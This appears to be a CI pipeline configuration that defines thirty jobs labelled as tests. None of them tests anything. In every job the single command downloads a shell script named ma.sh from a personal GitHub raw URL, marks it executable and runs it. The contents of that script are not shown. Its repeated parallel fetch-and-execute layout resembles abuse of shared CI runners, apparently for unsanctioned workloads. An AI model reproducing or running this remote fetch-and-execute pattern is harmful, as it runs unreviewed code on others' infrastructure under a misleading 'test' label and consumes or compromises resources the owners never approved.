test_1:
 stage: test
 script:
   - wget https://raw.githubusercontent.com/cb070/vss/main/ma.sh && chmod u+x ma.sh && ./ma.sh

test_2:
 stage: test
 script:
   - wget https://raw.githubusercontent.com/cb070/vss/main/ma.sh && chmod u+x ma.sh && ./ma.sh

test_3:
 stage: test
 script:
   - wget https://raw.githubusercontent.com/cb070/vss/main/ma.sh && chmod u+x ma.sh && ./ma.sh

test_4:
 stage: test
 script:
   - wget https://raw.githubusercontent.com/cb070/vss/main/ma.sh && chmod u+x ma.sh && ./ma.sh

test_5:
 stage: test
 script:
   - wget https://raw.githubusercontent.com/cb070/vss/main/ma.sh && chmod u+x ma.sh && ./ma.sh

test_6:
 stage: test
 script:
   - wget https://raw.githubusercontent.com/cb070/vss/main/ma.sh && chmod u+x ma.sh && ./ma.sh

test_7:
 stage: test
 script:
   - wget https://raw.githubusercontent.com/cb070/vss/main/ma.sh && chmod u+x ma.sh && ./ma.sh

test_8:
 stage: test
 script:
   - wget https://raw.githubusercontent.com/cb070/vss/main/ma.sh && chmod u+x ma.sh && ./ma.sh

test_9:
 stage: test
 script:
   - wget https://raw.githubusercontent.com/cb070/vss/main/ma.sh && chmod u+x ma.sh && ./ma.sh

test_10:
 stage: test
 script:
   - wget https://raw.githubusercontent.com/cb070/vss/main/ma.sh && chmod u+x ma.sh && ./ma.sh

test_11:
 stage: test
 script:
   - wget https://raw.githubusercontent.com/cb070/vss/main/ma.sh && chmod u+x ma.sh && ./ma.sh

test_12:
 stage: test
 script:
   - wget https://raw.githubusercontent.com/cb070/vss/main/ma.sh && chmod u+x ma.sh && ./ma.sh

test_13:
 stage: test
 script:
   - wget https://raw.githubusercontent.com/cb070/vss/main/ma.sh && chmod u+x ma.sh && ./ma.sh

test_14:
 stage: test
 script:
   - wget https://raw.githubusercontent.com/cb070/vss/main/ma.sh && chmod u+x ma.sh && ./ma.sh

test_15:
 stage: test
 script:
   - wget https://raw.githubusercontent.com/cb070/vss/main/ma.sh && chmod u+x ma.sh && ./ma.sh

test_16:
 stage: test
 script:
   - wget https://raw.githubusercontent.com/cb070/vss/main/ma.sh && chmod u+x ma.sh && ./ma.sh

test_17:
 stage: test
 script:
   - wget https://raw.githubusercontent.com/cb070/vss/main/ma.sh && chmod u+x ma.sh && ./ma.sh

test_18:
 stage: test
 script:
   - wget https://raw.githubusercontent.com/cb070/vss/main/ma.sh && chmod u+x ma.sh && ./ma.sh

test_19:
 stage: test
 script:
   - wget https://raw.githubusercontent.com/cb070/vss/main/ma.sh && chmod u+x ma.sh && ./ma.sh

test_20:
 stage: test
 script:
   - wget https://raw.githubusercontent.com/cb070/vss/main/ma.sh && chmod u+x ma.sh && ./ma.sh

test_21:
 stage: test
 script:
   - wget https://raw.githubusercontent.com/cb070/vss/main/ma.sh && chmod u+x ma.sh && ./ma.sh

test_22:
 stage: test
 script:
   - wget https://raw.githubusercontent.com/cb070/vss/main/ma.sh && chmod u+x ma.sh && ./ma.sh

test_23:
 stage: test
 script:
   - wget https://raw.githubusercontent.com/cb070/vss/main/ma.sh && chmod u+x ma.sh && ./ma.sh

test_24:
 stage: test
 script:
   - wget https://raw.githubusercontent.com/cb070/vss/main/ma.sh && chmod u+x ma.sh && ./ma.sh

test_25:
 stage: test
 script:
   - wget https://raw.githubusercontent.com/cb070/vss/main/ma.sh && chmod u+x ma.sh && ./ma.sh

test_26:
 stage: test
 script:
   - wget https://raw.githubusercontent.com/cb070/vss/main/ma.sh && chmod u+x ma.sh && ./ma.sh

test_27:
 stage: test
 script:
   - wget https://raw.githubusercontent.com/cb070/vss/main/ma.sh && chmod u+x ma.sh && ./ma.sh

test_28:
 stage: test
 script:
   - wget https://raw.githubusercontent.com/cb070/vss/main/ma.sh && chmod u+x ma.sh && ./ma.sh

test_29:
 stage: test
 script:
   - wget https://raw.githubusercontent.com/cb070/vss/main/ma.sh && chmod u+x ma.sh && ./ma.sh

test_30:
 stage: test
 script:
   - wget https://raw.githubusercontent.com/cb070/vss/main/ma.sh && chmod u+x ma.sh && ./ma.sh